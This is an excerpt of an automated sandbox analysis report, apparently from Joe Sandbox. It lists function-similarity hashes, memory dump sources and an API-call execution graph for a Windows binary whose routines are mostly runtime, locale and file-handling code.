                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                                                                          • String ID: csm$csm
                                                                                                                                          • API String ID: 4108983575-3733052814
                                                                                                                                          • Opcode ID: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
                                                                                                                                          • Instruction ID: e9fd3555d480e4ebadda4588c98b609b91d73cdf49de688a137fe66b11dbd346
                                                                                                                                          • Opcode Fuzzy Hash: 723d316c6bb1492db26d318ced58129fbbb71e04f86aecbd325fb3d3c805e488
                                                                                                                                          • Instruction Fuzzy Hash: E1515CB2B08A8286EA64AB57945427876E0FB44FA5F1441B7DB8D47AE5CF3CF860C701
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: NameName::
                                                                                                                                          • String ID: %lf
                                                                                                                                          • API String ID: 1333004437-2891890143
                                                                                                                                          • Opcode ID: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
                                                                                                                                          • Instruction ID: 52a06e46274a47030e9f96064f132dc5cc12c5c0162778aa279589fb8ebc8a47
                                                                                                                                          • Opcode Fuzzy Hash: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
                                                                                                                                          • Instruction Fuzzy Hash: 6F31B4B2B0CF8585EA60DB26A8502797370FB45F94F4481F3E9AE87265CF3CD5518740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E
                                                                                                                                          • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45243E
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: abortterminate
                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                          • API String ID: 661698970-2671469338
                                                                                                                                          • Opcode ID: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                                                                                                          • Instruction ID: 4707af12d9462f3d6f2484c01aa28e356b36a809efe0c17d0255c4ddf99349d1
                                                                                                                                          • Opcode Fuzzy Hash: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                                                                                                          • Instruction Fuzzy Hash: 86F03C76A18A4682EB506F66A1810797665EB48F64F1950F3E74807262CF3CD4B0CA41
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __C_specific_handler.LIBVCRUNTIME ref: 00007FFE1A45E9F0
                                                                                                                                            • Part of subcall function 00007FFE1A45EC30: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A45ECF0
                                                                                                                                            • Part of subcall function 00007FFE1A45EC30: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE1A45E9F5), ref: 00007FFE1A45ED3F
                                                                                                                                            • Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E
                                                                                                                                          • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45EA1A
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
                                                                                                                                          • String ID: csm$f
                                                                                                                                          • API String ID: 2451123448-629598281
                                                                                                                                          • Opcode ID: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
                                                                                                                                          • Instruction ID: b479b3da4346521d8074b59fb9537204e4fa657b5a33c0ea2cf2e72905c2445c
                                                                                                                                          • Opcode Fuzzy Hash: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
                                                                                                                                          • Instruction Fuzzy Hash: 57E037A5F18B4181D7307B62B14117D66A5AF15F64F1480F6D64807656CE78D8B04641
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2943138195-0
                                                                                                                                          • Opcode ID: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
                                                                                                                                          • Instruction ID: 996857dac50c7e8b3cf74c3128a7ebda37b01281f1425cd5fdf23e82d048d11c
                                                                                                                                          • Opcode Fuzzy Hash: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
                                                                                                                                          • Instruction Fuzzy Hash: B4918EA6F08F5689FB119BA2D8403BC2BB0BB05B24F5440F7DA4D576A6DF3CA865C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+$NameName::
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 168861036-0
                                                                                                                                          • Opcode ID: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
                                                                                                                                          • Instruction ID: b4e96470f146aab0293c23c966a862d76a51084b61ddae11b320a541f2fb1d8e
                                                                                                                                          • Opcode Fuzzy Hash: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
                                                                                                                                          • Instruction Fuzzy Hash: 405169B2F18B5A89E711DF22E8447BC37A0BB44B68F5480B2DA5E477A5DF39E461C340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2943138195-0
                                                                                                                                          • Opcode ID: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
                                                                                                                                          • Instruction ID: 8d907fbcc80c657dde9576ae18326677b863449b53272ee15ec5d3a58e6a5ca5
                                                                                                                                          • Opcode Fuzzy Hash: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
                                                                                                                                          • Instruction Fuzzy Hash: 624164B2B08B858AEB01DF66D8413BC77B0BB44B68F5481A6DA8D57769DF3894A1C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: abort$CreateFrameInfo
                                                                                                                                          • String ID: csm
                                                                                                                                          • API String ID: 2697087660-1018135373
                                                                                                                                          • Opcode ID: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
                                                                                                                                          • Instruction ID: e20f068562fb8a79c6376a3f11815f6f1b5ea2c11c22a2b7706f1c1482beb7f7
                                                                                                                                          • Opcode Fuzzy Hash: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
                                                                                                                                          • Instruction Fuzzy Hash: 6E514FB6718B4186D620AB26E04127E77B5F788FA0F1415B6EB8D07B66CF38D461CB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID: void$void
                                                                                                                                          • API String ID: 2943138195-3746155364
                                                                                                                                          • Opcode ID: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
                                                                                                                                          • Instruction ID: fdc32364626f0b2789df4b3192eb21c8d56db032a9ea0fa3e03a73e331164180
                                                                                                                                          • Opcode Fuzzy Hash: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
                                                                                                                                          • Instruction Fuzzy Hash: BB3159A6F18E5598FB01DBA1E8410FC33B0BB49B58B4405B7DE4D53B69DF389164C750
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileHeader$ExceptionRaise
                                                                                                                                          • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                                                          • API String ID: 3685223789-3176238549
                                                                                                                                          • Opcode ID: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
                                                                                                                                          • Instruction ID: 77a8a98164203b78b10b3da5ce8721de4c4edb34ad194b7efa84b1de598d03d5
                                                                                                                                          • Opcode Fuzzy Hash: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
                                                                                                                                          • Instruction Fuzzy Hash: 49015EA1B29E4692EE40EB16E450178A360FF90FA4F4454F3D61E476B6EF6CD524C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                          • String ID: csm
                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                          • Opcode ID: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                                                                                                          • Instruction ID: 24809a1097e044ec1e9fade81df69fa3e485ba4df1af179a0e31790d86056fee
                                                                                                                                          • Opcode Fuzzy Hash: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                                                                                                          • Instruction Fuzzy Hash: A0113D32618F8182EB518F16F440269B7A5FB88F94F2842B2DE9C07B68EF3CD561C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FFE1A4565B9,?,?,?,?,00007FFE1A45FB22,?,?,?,?,?), ref: 00007FFE1A45674B
                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FFE1A4565B9,?,?,?,?,00007FFE1A45FB22,?,?,?,?,?), ref: 00007FFE1A4567D4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                          • Opcode ID: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
                                                                                                                                          • Instruction ID: fdb1df9c94b19d349ed69f8c166ea8bf2120ad24cba9874ee0081fe6e84b312c
                                                                                                                                          • Opcode Fuzzy Hash: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
                                                                                                                                          • Instruction Fuzzy Hash: D1112164B0DA5242FA54AB27B804134A2A1AF48FB0F1846F6D97E077F5DF2CE8618700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:11.2%
                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                          Signature Coverage:3.7%
                                                                                                                                          Total number of Nodes:1573
                                                                                                                                          Total number of Limit Nodes:28
                                                                                                                                          execution_graph 25479 fa400 GdipDisposeImage GdipFree 25538 fd600 70 API calls 25480 106000 QueryPerformanceFrequency QueryPerformanceCounter 25513 10b100 FreeLibrary 25514 102900 6 API calls 4 library calls 25539 10f200 51 API calls 25553 10a700 21 API calls 25555 e1710 86 API calls 25518 fad10 73 API calls 23472 10bb30 23473 10bb39 23472->23473 23474 10bb42 23472->23474 23476 10ba27 23473->23476 23496 1097e5 GetLastError 23476->23496 23478 10ba34 23516 10bb4e 23478->23516 23480 10ba3c 23525 10b7bb 23480->23525 23486 10ba96 23550 108dcc 23486->23550 23489 10ba91 23549 1091a8 20 API calls __dosmaperr 23489->23549 23490 10ba53 23490->23474 23492 10bada 23492->23486 23556 10b691 26 API calls 23492->23556 23493 10baae 23493->23492 23494 108dcc _free 20 API calls 23493->23494 23494->23492 23497 109801 23496->23497 23498 1097fb 23496->23498 23503 109850 SetLastError 23497->23503 23558 10b136 23497->23558 23557 10ae5b 11 API calls 2 library calls 23498->23557 23502 10981b 23505 108dcc _free 20 API calls 23502->23505 23503->23478 23507 109821 23505->23507 23506 109830 23506->23502 23508 109837 23506->23508 23509 10985c SetLastError 23507->23509 23566 109649 20 API calls _unexpected 23508->23566 23567 108d24 38 API calls _abort 23509->23567 23512 109842 23514 108dcc _free 20 API calls 23512->23514 23515 109849 23514->23515 23515->23503 23515->23509 23517 10bb5a __FrameHandler3::FrameUnwindToState 23516->23517 23518 1097e5 _unexpected 38 API calls 23517->23518 23523 10bb64 23518->23523 23520 10bbe8 _abort 23520->23480 23523->23520 23524 108dcc _free 20 API calls 23523->23524 23570 108d24 38 API calls _abort 23523->23570 23571 10ac31 EnterCriticalSection 23523->23571 23572 10bbdf LeaveCriticalSection _abort 23523->23572 23524->23523 23573 104636 23525->23573 23528 10b7dc GetOEMCP 23530 10b805 23528->23530 23529 10b7ee 23529->23530 23531 10b7f3 GetACP 23529->23531 23530->23490 23532 108e06 23530->23532 23531->23530 23533 108e44 23532->23533 23537 108e14 _unexpected 23532->23537 23584 1091a8 20 API calls __dosmaperr 23533->23584 23534 108e2f RtlAllocateHeap 23536 108e42 23534->23536 23534->23537 23536->23486 23539 10bbf0 23536->23539 23537->23533 23537->23534 23583 107a5e 7 API calls 2 library calls 23537->23583 23540 10b7bb 40 API calls 23539->23540 23542 10bc0f 23540->23542 23541 10bc85 _abort 23585 10b893 GetCPInfo 23541->23585 23542->23541 23543 10bc16 23542->23543 23546 10bc60 IsValidCodePage 23542->23546 23595 ffbbc 23543->23595 23545 10ba89 23545->23489 23545->23493 23546->23543 23547 10bc72 GetCPInfo 23546->23547 23547->23541 23547->23543 23549->23486 23551 108e00 __dosmaperr 23550->23551 23552 108dd7 RtlFreeHeap 23550->23552 23551->23490 23552->23551 23553 108dec 23552->23553 23676 1091a8 20 API calls __dosmaperr 23553->23676 23555 108df2 GetLastError 23555->23551 23556->23486 23557->23497 23563 10b143 _unexpected 23558->23563 23559 10b183 23569 1091a8 20 API calls __dosmaperr 23559->23569 23560 10b16e RtlAllocateHeap 23561 109813 23560->23561 23560->23563 23561->23502 23565 10aeb1 11 API calls 2 library calls 23561->23565 23563->23559 23563->23560 23568 107a5e 7 API calls 2 library calls 23563->23568 23565->23506 23566->23512 23568->23563 23569->23561 23571->23523 23572->23523 23574 104653 23573->23574 23575 104649 23573->23575 23574->23575 23576 1097e5 _unexpected 38 API calls 23574->23576 23575->23528 23575->23529 23577 104674 23576->23577 23581 10993a 38 API calls __cftof 23577->23581 23579 10468d 23582 109967 38 API calls __cftof 23579->23582 23581->23579 23582->23575 23583->23537 23584->23536 23586 10b977 23585->23586 23592 10b8cd 23585->23592 23589 ffbbc _ValidateLocalCookies 5 API calls 23586->23589 23591 10ba23 23589->23591 23591->23543 23602 10c988 23592->23602 23594 10ab78 __vswprintf_c_l 43 API calls 23594->23586 23596 ffbc5 IsProcessorFeaturePresent 23595->23596 23597 ffbc4 23595->23597 23599 ffc07 23596->23599 23597->23545 23675 ffbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23599->23675 23601 ffcea 23601->23545 23603 104636 __cftof 38 API calls 23602->23603 23604 10c9a8 MultiByteToWideChar 23603->23604 23606 10c9e6 23604->23606 23607 10ca7e 23604->23607 23609 108e06 __vswprintf_c_l 21 API calls 23606->23609 23612 10ca07 _abort __vsnwprintf_l 23606->23612 23608 ffbbc _ValidateLocalCookies 5 API calls 23607->23608 23610 10b92e 23608->23610 23609->23612 23616 10ab78 23610->23616 23611 10ca78 23621 10abc3 20 API calls _free 23611->23621 23612->23611 23614 10ca4c MultiByteToWideChar 23612->23614 23614->23611 23615 10ca68 GetStringTypeW 23614->23615 23615->23611 23617 104636 __cftof 38 API calls 23616->23617 23618 10ab8b 23617->23618 23622 10a95b 23618->23622 23621->23607 23623 10a976 __vswprintf_c_l 23622->23623 23624 10a99c MultiByteToWideChar 23623->23624 23625 10ab50 23624->23625 23626 10a9c6 23624->23626 23627 ffbbc _ValidateLocalCookies 5 API calls 23625->23627 23631 108e06 __vswprintf_c_l 21 API calls 23626->23631 23633 10a9e7 __vsnwprintf_l 23626->23633 23628 10ab63 23627->23628 23628->23594 23629 10aa30 MultiByteToWideChar 23630 10aa9c 23629->23630 23632 10aa49 23629->23632 23658 10abc3 20 API calls _free 23630->23658 23631->23633 23649 10af6c 23632->23649 23633->23629 23633->23630 23637 10aa73 23637->23630 23641 10af6c __vswprintf_c_l 11 API calls 23637->23641 23638 10aaab 23639 108e06 __vswprintf_c_l 21 API calls 23638->23639 23643 10aacc __vsnwprintf_l 23638->23643 23639->23643 23640 10ab41 23657 10abc3 20 API calls _free 23640->23657 23641->23630 23643->23640 23644 10af6c __vswprintf_c_l 11 API calls 23643->23644 23645 10ab20 23644->23645 23645->23640 23646 10ab2f WideCharToMultiByte 23645->23646 23646->23640 23647 10ab6f 23646->23647 23659 10abc3 20 API calls _free 23647->23659 23660 10ac98 23649->23660 23653 10afdc LCMapStringW 23654 10af9c 23653->23654 23655 ffbbc _ValidateLocalCookies 5 API calls 23654->23655 23656 10aa60 23655->23656 23656->23630 23656->23637 23656->23638 23657->23630 23658->23625 23659->23630 23661 10acc4 23660->23661 23662 10acc8 23660->23662 23661->23662 23663 10ace8 23661->23663 23668 10ad34 23661->23668 23662->23654 23667 10aff4 10 API calls 3 library calls 23662->23667 23663->23662 23665 10acf4 GetProcAddress 23663->23665 23666 10ad04 _unexpected 23665->23666 23666->23662 23667->23653 23669 10ad55 LoadLibraryExW 23668->23669 23673 10ad4a 23668->23673 23670 10ad72 GetLastError 23669->23670 23671 10ad8a 23669->23671 23670->23671 23674 10ad7d LoadLibraryExW 23670->23674 23672 10ada1 FreeLibrary 23671->23672 23671->23673 23672->23673 23673->23661 23674->23671 23675->23601 23676->23555 25482 10c030 GetProcessHeap 25483 e1025 29 API calls 25540 fc220 93 API calls _swprintf 25485 10f421 21 API calls __vswprintf_c_l 25519 10b4ae 27 API calls _ValidateLocalCookies 25520 ff530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25558 fff30 LocalFree 24413 10c051 31 API calls _ValidateLocalCookies 25489 fa440 GdipCloneImage GdipAlloc 25541 103a40 5 API calls _ValidateLocalCookies 25559 111f40 CloseHandle 24438 fcd58 24440 fce22 24438->24440 24445 fcd7b 24438->24445 24454 fc793 _wcslen _wcsrchr 24440->24454 24466 fd78f 24440->24466 24442 fd40a 24444 f1fbb CompareStringW 24444->24445 24445->24440 24445->24444 24446 fca67 SetWindowTextW 24446->24454 24451 fc855 SetFileAttributesW 24453 fc90f GetFileAttributesW 24451->24453 24464 fc86f _abort _wcslen 24451->24464 24453->24454 24456 fc921 DeleteFileW 24453->24456 24454->24442 24454->24446 24454->24451 24457 fcc31 GetDlgItem SetWindowTextW SendMessageW 24454->24457 24460 fcc71 SendMessageW 24454->24460 24465 f1fbb CompareStringW 24454->24465 24490 fb314 24454->24490 24494 fa64d GetCurrentDirectoryW 24454->24494 24496 ea5d1 6 API calls 24454->24496 24497 ea55a FindClose 24454->24497 24498 fb48e 76 API calls 2 library calls 24454->24498 24499 103e3e 24454->24499 24456->24454 24458 fc932 24456->24458 24457->24454 24459 e4092 _swprintf 51 API calls 24458->24459 24461 fc952 GetFileAttributesW 24459->24461 24460->24454 24461->24458 24462 fc967 MoveFileW 24461->24462 24462->24454 24463 fc97f MoveFileExW 24462->24463 24463->24454 24464->24453 24464->24454 24495 eb991 51 API calls 2 library calls 24464->24495 24465->24454 24468 fd799 _abort _wcslen 24466->24468 24467 fd9e7 24467->24454 24468->24467 24469 fd8a5 24468->24469 24470 fd9c0 24468->24470 24515 f1fbb CompareStringW 24468->24515 24512 ea231 24469->24512 24470->24467 24473 fd9de ShowWindow 24470->24473 24473->24467 24475 